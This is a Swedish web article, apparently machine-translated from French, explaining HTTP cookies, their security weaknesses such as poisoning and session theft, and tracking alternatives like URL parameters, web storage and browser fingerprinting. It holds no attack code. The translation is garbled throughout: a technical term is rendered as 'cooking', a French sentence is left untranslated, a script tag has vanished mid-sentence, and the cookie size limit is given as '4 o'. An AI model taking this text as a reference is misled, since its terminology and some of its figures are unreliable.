Cookies Àr inte direkt synliga för program pÄ klientsidan som JavaScript om de skickades med HttpOnly-flaggan. Ur serverns synvinkel Àr den enda skillnaden att i raden i Set-Cookie-huvudet lÀggs ett nytt fÀlt till som innehÄller strÀngen HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

NÀr webblÀsaren tar emot en sÄdan cookie Àr det meningen att den ska anvÀnda den normalt i följande HTTP-utbyte, men utan att göra den synlig för skript som körs pÄ klientsidan. HttpOnly-flaggan Àr inte en del av nÄgon officiell teknisk specifikation och Àr inte implementerad i alla webblÀsare. Observera att det för nÀrvarande inte finns nÄgot sÀtt att förhindra lÀsning och skrivning av sessionscookies med metoden XMLHTTPRequest.

Ändring av innehĂ„ll: en angripare skickar en ogiltig cookie till en server, möjligen gjord av en giltig cookie som skickas av servern.

SÄ snart cookies behöver lagras och returneras oförÀndrade till servern kan en angripare Àndra vÀrdet pÄ cookies innan de skickas tillbaka till servern. Till exempel, om en cookie innehÄller det totala vÀrdet som anvÀndaren mÄste betala för varorna som placeras i butikens kundvagn, utsÀtter en Àndring av detta vÀrde servern för risken att debitera angriparen mindre Àn utgÄngspriset. Processen att Àndra vÀrdet pÄ cookies kallas kakförgiftning och kan anvÀndas efter kakstöld för att göra attacken ihÄllande.

I cookie-override-metoden utnyttjar angriparen ett webblÀsarfel för att skicka en ogiltig cookie till servern.

De flesta webbplatser lagrar dock bara ett sessions-ID – ett slumpmĂ€ssigt genererat unikt nummer som anvĂ€nds för att identifiera sessionsanvĂ€ndaren – i sjĂ€lva cookien, medan all annan information lagras pĂ„ servern. I det hĂ€r fallet Ă€r detta problem till stor del löst.

Varje webbplats förvÀntas ha sina egna cookies, sÄ en webbplats ska inte kunna Àndra eller skapa cookies kopplade till en annan webbplats. Ett sÀkerhetsfel i webblÀsaren kan göra att skadliga webbplatser bryter mot denna regel. Utnyttjandet av ett sÄdant fel kallas vanligtvis matlagning över platsen. Syftet med sÄdana attacker kan vara stöld av sessions-ID.

AnvÀndare bör anvÀnda de senaste versionerna av webblÀsare dÀr dessa sÄrbarheter praktiskt taget Àr eliminerade.

KonflikttillstÄnd mellan klient och server

AnvÀndningen av cookies kan skapa en motsÀgelse mellan klientens tillstÄnd och det tillstÄnd som lagras i cookien. Om anvÀndaren skaffar en cookie och klickar pÄ "Tillbaka"-knappen i webblÀsaren, Àr webblÀsarens tillstÄnd i allmÀnhet inte detsamma som före detta förvÀrv. Till exempel, om varukorgen i en onlinebutik skapas med hjÀlp av cookies, kan innehÄllet i varukorgen inte Àndras nÀr anvÀndaren ÄtervÀnder till webblÀsarhistoriken: om anvÀndaren trycker pÄ en knapp för att lÀgga till en artikel i sin varukorg och klickar pÄ "Return". "-knappen, artikeln finns kvar i den hÀr. Detta kanske inte Àr anvÀndarens avsikt, som verkligen vill avbryta tillÀgget av artikeln. Detta kan leda till opÄlitlighet, förvirring och buggar. SÄ webbutvecklare bör vara medvetna om detta problem och vidta ÄtgÀrder för att hantera situationer som denna.

BestÀndiga cookies har kritiserats av sekretesssÀkerhetsexperter för att de inte Àr instÀllda pÄ att löpa ut tillrÀckligt snabbt, vilket gör att webbplatser kan spÄra anvÀndare och bygga upp deras profil över tid. Denna aspekt av cookies Àr ocksÄ en del av sessionskapningsproblemet, eftersom en stulen persistent cookie kan anvÀndas för att imitera en anvÀndare under en lÀngre tid.

LÀs ocksÄ: GAFAM: vilka Àr de? Varför Àr de (ibland) sÄ lÀskiga?

Alternativ till cookies

Vissa operationer som kan utföras med hjÀlp av cookies kan ocksÄ utföras med andra mekanismer som kringgÄr cookies eller Äterskapar raderade cookies, vilket skapar sekretessproblem pÄ samma sÀtt (eller ibland vÀrre eftersom de dÄ Àr osynliga) Àn cookies.

IP-adress

AnvÀndare kan spÄras med IP-adressen till den dator som ringer sidan. Denna teknik har varit tillgÀnglig sedan introduktionen av World Wide Web, eftersom sidor laddas ner begÀr servern IP-adressen till den dator som kör webblÀsaren eller proxyn, om ingen anvÀnds. Servern kan spÄra denna information oavsett om det finns cookies som anvÀnds eller inte. Dessa adresser Àr dock vanligtvis mindre tillförlitliga för att identifiera en anvÀndare Àn cookies eftersom datorer och proxyservrar kan delas av flera anvÀndare, och samma dator kan fÄ en annan IP-adress vid varje arbetssession (som c ofta Àr fallet för telefonanslutningar) .

SpÄrning av IP-adresser kan vara tillförlitlig i vissa situationer, till exempel bredbandsanslutningar som bibehÄller samma IP-adress under lÄng tid, sÄ lÀnge som strömmen Àr pÄ.

Vissa system som Tor Àr utformade för att upprÀtthÄlla anonymiteten pÄ Internet och göra spÄrning med IP-adress omöjlig eller opraktisk.

URL

En mer exakt teknik bygger pÄ att bÀdda in information i webbadresser. FrÄgestrÀngsdelen av URL:en Àr en teknik som vanligtvis anvÀnds för detta ÀndamÄl, men andra delar kan ocksÄ anvÀndas. BÄde Java-serverlet och PHP-sessionsmekanismerna anvÀnder denna metod om cookies inte Àr aktiverade.

Denna metod innebÀr att webbservern lÀgger till strÀngförfrÄgningar till lÀnkarna pÄ webbsidan som bÀr den nÀr den skickas till webblÀsaren. NÀr anvÀndaren följer en lÀnk returnerar webblÀsaren den bifogade frÄgestrÀngen till servern.

FrÄgestrÀngar som anvÀnds för detta ÀndamÄl och cookies Àr mycket lika, bÄda Àr information godtyckligt vald av servern och returneras av webblÀsaren. Det finns dock vissa skillnader: nÀr en URL som innehÄller en frÄgestrÀng ÄteranvÀnds skickas samma information till servern. Till exempel, om en anvÀndares instÀllningar Àr kodade i en frÄgestrÀng för en URL och anvÀndaren skickar den URL:en till en annan anvÀndare via e-post, kommer den anvÀndaren ocksÄ att kunna anvÀnda dessa instÀllningar.

Å andra sidan, nĂ€r en anvĂ€ndare öppnar samma sida tvĂ„ gĂ„nger, finns det ingen garanti för att samma frĂ„gestrĂ€ng kommer att anvĂ€ndas bĂ„da gĂ„ngerna. Till exempel, om en anvĂ€ndare landar pĂ„ en sida frĂ„n en intern webbplatssida första gĂ„ngen och landar pĂ„ samma sida frĂ„n en extern sida andra gĂ„ngen, Ă€r frĂ„gestrĂ€ngen i förhĂ„llande till webbplatssidan vanligtvis annorlunda, medan cookies Ă€r desamma .

Andra nackdelar med frÄgestrÀngar Àr relaterade till sÀkerhet: att behÄlla data som identifierar en session i frÄgestrÀngar möjliggör eller förenklar sessionsfixeringsattacker, identifierarreferensattacker och andra utnyttjande. Att skicka sessions-ID:n som HTTP-cookies Àr sÀkrare.

Dolt formulÀrfÀlt

En form av sessionsspÄrning, som anvÀnds av ASP.NET, Àr att anvÀnda webbformulÀr med dolda fÀlt. Denna teknik Àr mycket lik att anvÀnda URL-frÄgestrÀngar för att överföra information och har samma fördelar och nackdelar; och om formulÀret bearbetas med HTTP GET-metoden blir fÀlten faktiskt en del av webbadressen till webblÀsaren som skickar den nÀr formulÀret skickas. Men de flesta formulÀr behandlas med HTTP POST, vilket gör att formulÀrinformationen, inklusive dolda fÀlt, lÀggs till som en extra indata som varken Àr en del av URL:en eller en cookie.

Det hÀr tillvÀgagÄngssÀttet har tvÄ fördelar ur ett spÄrningsperspektiv: för det första, spÄrning av informationen som placeras i HTML-kÀllkoden och POST-inmatning snarare Àn URL-adressen gör att den genomsnittliga anvÀndaren kan undvika denna spÄrning; för det andra kopieras inte sessionsinformationen nÀr anvÀndaren kopierar URL:en (för att till exempel spara sidan pÄ disk eller skicka den via e-post).

fönster.namn

Alla vanliga webblÀsare kan lagra ganska stora mÀngder data (2MB till 32MB) via JavaScript med hjÀlp av DOM:s window.name-egenskap. Denna data kan anvÀndas istÀllet för sessionscookies och anvÀnds Àven över domÀner. Tekniken kan kopplas till JSON-objekt för att lagra en komplex uppsÀttning sessionsvariabler pÄ klientsidan.

Nackdelen Àr att varje separat fönster eller flik initialt kommer att ha ett tomt window.name; nÀr du blÀddrar efter flikar (öppnas av anvÀndaren) betyder det att flikarna som öppnas individuellt inte kommer att ha ett fönsternamn. Dessutom kan window.name anvÀndas för att spÄra besökare pÄ olika webbplatser som kan utgöra ett integritetsproblem.

I vissa avseenden kan detta vara sÀkrare Àn cookies, pÄ grund av att servern inte Àr involverad, vilket gör den osÄrbar för nÀtverksattacker av sniffer-cookies. Om speciella ÄtgÀrder vidtas för att skydda uppgifterna Àr det dock sÄrbart för ytterligare attacker, eftersom uppgifterna Àr tillgÀngliga via andra sajter som öppnas i samma fönster.

HTTP-autentisering

HTTP-protokollet inkluderar de grundlÀggande Ätkomstautentiseringsprotokollen och Ätkomstautentiseringssammandraget, som tillÄter Ätkomst till en webbsida endast nÀr anvÀndaren har angett anvÀndarnamn och lösenord. Om servern begÀr ett certifikat för att ge Ätkomst till en webbsida, begÀr webblÀsaren det frÄn anvÀndaren och nÀr den har fÄtt det lagrar webblÀsaren det och skickar det i alla efterföljande HTTP-förfrÄgningar. Denna information kan anvÀndas för att spÄra anvÀndaren.

Lokalt delat objekt

Om en webblÀsare innehÄller plugin-programmet Adobe Flash Player, lokala delade objekt kan anvÀndas för samma ÀndamÄl som cookies. De kan vara ett attraktivt val för webbutvecklare eftersom:

  • standardstorleksgrĂ€nsen för ett lokalt delat objekt Ă€r 100 KB;
  • sĂ€kerhetskontroller Ă€r separata frĂ„n kontroller av anvĂ€ndarcookies (sĂ„ lokala delade objekt kan tillĂ„tas nĂ€r cookies inte Ă€r det).

Denna sista punkt, som skiljer policyn för cookiehantering frÄn den för Adobes lokala delade objekt vÀcker frÄgor angÄende anvÀndarens hantering av sina sekretessinstÀllningar: han mÄste vara medveten om att hans hantering av cookies inte har nÄgon inverkan pÄ hanteringen av lokala delade objekt, och vice versa.

En annan kritik mot detta system Àr att det endast kan anvÀndas via Adobe Flash Player-plugin som Àr proprietÀr och inte en webbstandard.

UthÄllighet pÄ klientsidan

Vissa webblÀsare stöder en skriptbaserad bestÀndighetsmekanism, som gör att sidan kan lagra information lokalt för senare anvÀndning. Internet Explorer, till exempel, stöder bestÀndig information i webblÀsarhistorik, bokmÀrken, i ett format som lagras i XML eller direkt med en webbsida sparad pÄ disk. För Microsoft Internet Explorer 5 finns en anvÀndardatametod tillgÀnglig via DHTML-beteenden.

W3C introducerade i HTML 5 ett nytt JavaScript API för datalagring pÄ klientsidan som kallas webblagring och syftade till att permanent ersÀtta cookies. Det liknar cookies men med kraftigt förbÀttrad kapacitet och utan att lagra information i headern för HTTP-förfrÄgningar. API:et tillÄter tvÄ typer av webblagring: lokal lagring och sessionslagring, liknande bestÀndiga cookies och sessionscookies (förutom att sessionscookies upphör nÀr webblÀsaren stÀngs medan sessionslagring löper ut nÀr fliken stÀngs). Webblagring stöds av Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 och Opera 10.50.

En annan mekanism förlitar sig normalt pĂ„ webblĂ€sarcache (i minne snarare Ă€n uppdatering) med JavaScript-program pĂ„ webbsidor. 

Till exempel kan en sida innehĂ„lla taggen . La premiĂšre fois que la page se charge, le programme exemple.js est aussi chargĂ©. 

Vid denna tidpunkt finns programmet kvar i cacheminnet och den besökta sidan laddas inte om en andra gĂ„ng. Följaktligen, om programmet innehĂ„ller en global variabel (till exempel var id = 3243242;), förblir denna identifierare giltig och kan utnyttjas av annan JavaScript-kod nĂ€r sidan laddas igen, eller nĂ€r en sida som lĂ€nkar programmet har laddats. 

Den stora nackdelen med denna metod Àr att JavaScripts globala variabel mÄste vara statisk, vilket innebÀr att den inte kan Àndras eller raderas som en cookie.

webblÀsarens fingeravtryck

Ett webblÀsarfingeravtryck Àr information som samlas in om konfigurationsinstÀllningarna för en webblÀsare i identifieringssyfte. Dessa fingeravtryck kan anvÀndas för att helt eller delvis identifiera en InternetanvÀndare eller en enhet Àven nÀr cookies Àr inaktiverade.

GrundlÀggande webblÀsarkonfigurationsinformation har lÀnge samlats in av webbpubliktjÀnster i syfte att exakt mÀta mÀnsklig webbtrafik och upptÀcka olika former av klickbedrÀgeri. Med hjÀlp av skriptsprÄk pÄ klientsidan blir informationsinsamlingen mycket mer exakt nu möjligt.

Att konvertera denna information till en bitstrÀng ger ett fingeravtryck pÄ enheten. 2010 mÀtte Electronic Frontier Foundation (EFF) entropin i en webblÀsares fingeravtryck till att vara minst 18,1 bitar, och det var innan framstegen inom canvas fingeravtryck lade 5,7 bitar till den entropin.

Kakor i ett nötskal

Cookies Àr smÄ textfiler som lagras av webblÀsaren pÄ en webbplatsbesökares hÄrddisk och som anvÀnds (bland annat) för att registrera information om besökaren eller dennes resa genom webbplatsen. Webbmastern kan alltsÄ kÀnna igen en besökares vanor och anpassa presentationen av sin webbplats för varje besökare; cookies gör det sedan möjligt att komma ihÄg hur mÄnga artiklar som ska visas pÄ hemsidan eller till och med behÄlla inloggningsuppgifterna för en privat part: nÀr besökaren ÄtervÀnder till webbplatsen Àr det inte lÀngre nödvÀndigt för honom att skriva in sitt namn och lösenord för att kÀnnas igen, eftersom de automatiskt lÀses i cookien.

En cookie har en begrÀnsad livslÀngd, instÀlld av webbplatsdesignern. De kan ocksÄ upphöra att gÀlla i slutet av sessionen pÄ webbplatsen, vilket motsvarar att webblÀsaren stÀngs. Cookies anvÀnds i stor utstrÀckning för att göra livet enklare för besökare och ge dem mer relevant information. Men speciella tekniker gör det möjligt att följa en besökare pÄ flera sajter och pÄ sÄ sÀtt samla in och korskontrollera mycket omfattande information om dennes vanor. Denna metod har gett anvÀndningen av cookies ett rykte som en övervakningsteknik som krÀnker besökarnas integritet, vilket tyvÀrr överensstÀmmer med verkligheten i mÄnga fall av anvÀndning av icke-tekniska skÀl eller som inte respekterar anvÀndarnas förvÀntningar. .

Som svar pÄ dessa berÀttigade farhÄgor introducerar HTML 5 ett nytt JavaScript API för datalagring pÄ klientsidan som kallas webblagring, som Àr mycket sÀkrare och med större kapacitet, som syftar till att ersÀtta cookies.

Lagring av cookies

Med vissa webblÀsare Àr en cookie lÀtt redigerbar, en enkel textredigerare som Anteckningar rÀcker för att Àndra dess vÀrden manuellt.

Cookies sparas pÄ olika sÀtt beroende pÄ webblÀsare:

  • Microsoft Internet Explorer sparar varje cookie i en annan fil;
  • Mozilla Firefox sparar alla sina cookies i en enda fil;
  • Opera sparar alla sina cookies i en enda fil och krypterar dem (omöjligt att Ă€ndra dem förutom i programvarualternativen);
  • Apple Safari sparar alla sina cookies i en enda .plist-tillĂ€ggsfil. Ändring Ă€r möjlig men inte sĂ€rskilt lĂ€tt, om du inte gĂ„r igenom mjukvarualternativen.

WebblÀsare krÀvs för att stödja Ätminstone :

  • 300 samtidiga kakor;
  • 4 o per kaka;
  • 20 cookies per vĂ€rd eller domĂ€n.
[Total: 0 Betyda: 0]

Skriven av Recensioner Redaktörer

Teamet av expertredaktörer spenderar sin tid pÄ att undersöka produkter, utföra praktiska tester, intervjua branschpersonal, granska konsumentrecensioner och skriva alla vÄra resultat som en förstÄelig och omfattande sammanfattning.

LĂ€mna en kommentar

Din e-postadress kommer inte att publiceras. Obligatoriska fÀlt Àr markerade *

Vad tror du?

384 PoÀng
upvote downvote